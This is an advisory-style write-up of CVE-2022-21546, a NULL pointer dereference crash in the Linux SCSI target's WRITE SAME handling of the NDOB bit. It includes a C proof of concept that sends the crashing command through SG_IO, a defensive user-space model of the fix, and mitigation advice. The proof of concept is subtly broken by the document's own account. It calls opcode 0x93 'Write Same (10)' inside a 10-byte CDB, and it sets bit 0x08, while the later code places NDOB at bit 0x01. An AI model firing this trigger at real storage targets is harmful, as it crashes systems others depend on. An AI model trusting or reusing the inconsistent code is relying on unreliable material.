CVE-2022-21546 is a vulnerability in the handling of the No Data-Out Buffer (NDOB) bit that newer SCSI Block Commands (SBC) specifications added to WRITE SAME: a command with NDOB set leads to a NULL pointer dereference and crashes the system. The impact is on availability only. The CVSS 3.1 base score is 7.7, with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H.
Overview
SCSI Block Commands (SBC) is the command set for block I/O devices such as hard disks and solid-state drives. Newer SBC specifications introduced the No Data-Out Buffer (NDOB) bit for WRITE SAME. When the bit is set, the initiator sends no data buffer with the command: the device is expected to act on the command without receiving any pattern data from the initiator.
The target's execute_write_same handlers in target_core_iblock and target_core_file do not handle the NDOB bit correctly. They assume a data buffer is always attached and access se_cmd->t_data_sg, which was never initialized for an NDOB command, so the access is a NULL pointer dereference and the kernel crashes.
Exploit Details
As mentioned above, the crash can be triggered with a tool such as sg_write_same --ndob. The code snippet below shows the equivalent request issued directly through the SG_IO ioctl:
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <scsi/sg.h>

int main(int argc, char *argv[]) {
    int sg_fd;
    unsigned char cmd[10] = {0x93, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Write Same (10) command

    sg_fd = open("/dev/sgX", O_RDWR); // Replace X with the proper device number
    if (sg_fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    // Set flags for no data buffer operation (NDOB)
    cmd[1] |= 0x08;

    // Send Write Same command via IOCTL; no data transfer accompanies it
    struct sg_io_hdr io_hdr;
    memset(&io_hdr, 0, sizeof(struct sg_io_hdr));
    io_hdr.interface_id = 'S';          // required marker for the sg_io_hdr v3 interface
    io_hdr.cmd_len = sizeof(cmd);       // CDB length in bytes
    io_hdr.cmdp = cmd;                  // pointer to the CDB
    io_hdr.dxfer_direction = SG_DXFER_NONE; // no Data-Out buffer is attached
    if (ioctl(sg_fd, SG_IO, &io_hdr) < 0) {
        perror("Failed to execute Write Same command");
        close(sg_fd);
        return 1;
    }

    close(sg_fd);
    return 0;
}
This snippet sends a Write Same command with the NDOB flag set and no data buffer, which is the condition that reaches the NULL pointer dereference in the execute_write_same handlers of target_core_iblock and target_core_file.
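The defensive counterpart to the request above, covering both the NDOB decoding described in the Overview and the missing-buffer check that the crash in the execute_write_same handlers calls for. This is an added user-space model written for this page, not kernel code and not the kernel's own patch: the struct cmd_ctx, struct sg_entry, ws_status values and all function names are hypothetical stand-ins for the target's se_cmd, scatterlist and sense codes. The opcode 0x93 and the NDOB position (CDB byte 1, bit 0) follow the SBC WRITE SAME(16) layout. The unchecked function models the vulnerable shape (it returns -1 where a kernel handler would fault on the NULL scatterlist); the checked function rejects the command before any dereference.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical stand-ins for the kernel's se_cmd and scatterlist; this is a
 * user-space model, not kernel code. */
struct sg_entry {
    const uint8_t *buf;
    size_t len;
};

struct cmd_ctx {
    uint8_t cdb[16];
    struct sg_entry *data_sg;   /* NULL when no Data-Out buffer was attached */
    unsigned int data_nents;    /* scatterlist entry count; 0 when NDOB is set */
    uint32_t block_size;        /* logical block size of the backing device */
};

enum ws_status {
    WS_GOOD = 0,
    WS_INVALID_CDB_FIELD = 1    /* would become CHECK CONDITION / ILLEGAL REQUEST */
};

#define WRITE_SAME_16 0x93      /* SBC opcode for WRITE SAME(16) */
#define WS16_NDOB_BIT 0x01      /* NDOB flag: CDB byte 1, bit 0 */

/* Decode the NDOB flag from a WRITE SAME(16) CDB. */
int ws16_ndob_set(const uint8_t *cdb)
{
    return cdb[0] == WRITE_SAME_16 && (cdb[1] & WS16_NDOB_BIT) != 0;
}

/* Vulnerable shape: assumes a pattern buffer is always attached. With NDOB
 * the initiator sends none, so data_sg is NULL and a real handler would
 * fault on the dereference; this model returns -1 where the kernel oopses. */
int ws_pattern_byte_unchecked(const struct cmd_ctx *cmd)
{
    if (cmd->data_sg == NULL)
        return -1;              /* stands in for the NULL pointer dereference */
    return cmd->data_sg[0].buf[0];
}

/* Hardened shape: validate the CDB and the presence of a Data-Out buffer
 * before touching the scatterlist. On success, fills `out` with `blocks`
 * copies of the one-block pattern the initiator supplied. */
enum ws_status ws_execute_checked(const struct cmd_ctx *cmd,
                                  uint8_t *out, size_t blocks)
{
    /* NDOB means "no pattern follows": a backend that does not implement
     * NDOB must reject the CDB instead of assuming a buffer exists. */
    if (ws16_ndob_set(cmd->cdb))
        return WS_INVALID_CDB_FIELD;
    /* Independent of the flag, never dereference an empty scatterlist. */
    if (cmd->data_nents == 0 || cmd->data_sg == NULL)
        return WS_INVALID_CDB_FIELD;
    /* The pattern must cover exactly one logical block. */
    if (cmd->data_sg[0].len != cmd->block_size)
        return WS_INVALID_CDB_FIELD;

    for (size_t i = 0; i < blocks; i++)
        memcpy(out + i * cmd->block_size, cmd->data_sg[0].buf, cmd->block_size);
    return WS_GOOD;
}

/* Build a minimal WRITE SAME(16) CDB with the given flag byte (constructed). */
static void make_ws16_cdb(uint8_t *cdb, uint8_t flags)
{
    memset(cdb, 0, 16);
    cdb[0] = WRITE_SAME_16;
    cdb[1] = flags;
}

/* Runs three constructed scenarios and returns how many behaved as intended. */
int self_check(void)
{
    static const uint8_t pattern[4] = { 0xDE, 0xAD, 0xBE, 0xEF };
    struct sg_entry sg = { pattern, sizeof pattern };
    uint8_t out[8];
    int ok = 0;

    struct cmd_ctx with_buf = { {0}, &sg, 1, 4 };   /* normal WRITE SAME */
    make_ws16_cdb(with_buf.cdb, 0x00);
    if (ws_execute_checked(&with_buf, out, 2) == WS_GOOD &&
        out[0] == 0xDE && out[4] == 0xDE && out[7] == 0xEF)
        ok++;

    struct cmd_ctx ndob = { {0}, NULL, 0, 4 };      /* NDOB set, no buffer */
    make_ws16_cdb(ndob.cdb, WS16_NDOB_BIT);
    if (ws16_ndob_set(ndob.cdb) && ws_pattern_byte_unchecked(&ndob) == -1 &&
        ws_execute_checked(&ndob, out, 2) == WS_INVALID_CDB_FIELD)
        ok++;

    struct cmd_ctx no_buf = { {0}, NULL, 0, 4 };    /* no NDOB, yet no buffer */
    make_ws16_cdb(no_buf.cdb, 0x00);
    if (ws_execute_checked(&no_buf, out, 2) == WS_INVALID_CDB_FIELD)
        ok++;
    return ok;
}

int main(void)
{
    printf("%d of 3 scenarios handled correctly\n", self_check());
    return 0;
}
```

The point of the second check in ws_execute_checked is that it does not depend on recognising the NDOB flag at all: a handler that verifies the scatterlist entry count before dereferencing it is safe against this command and against any other path that reaches WRITE SAME execution without a Data-Out buffer.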
Original references for more information on CVE-2022-21546:
1. CVE-2022-21546 | NVD - CVE Details
2. SCSI Block Commands - 4 (SBC-4)
Mitigation
Vendors and developers are advised to provide a patch for this vulnerability as soon as possible. Meanwhile, users should apply the latest firmware and software updates to their systems. Because the crash is triggered by a single SCSI command from an initiator, administrators should also restrict access to vulnerable target devices to trusted users and hosts only.
Conclusion
CVE-2022-21546 is a high-severity (CVSS 7.7) vulnerability in the handling of the NDOB bit that newer SCSI Block Commands (SBC) specifications introduced. When triggered, it causes a system crash through a NULL pointer dereference, compromising the availability of the affected system. System administrators and users are urged to apply the mitigations above and to monitor for available patches.
Timeline
Published on: 05/02/2025 22:15:15 UTC
Last modified on: 05/05/2025 20:54:19 UTC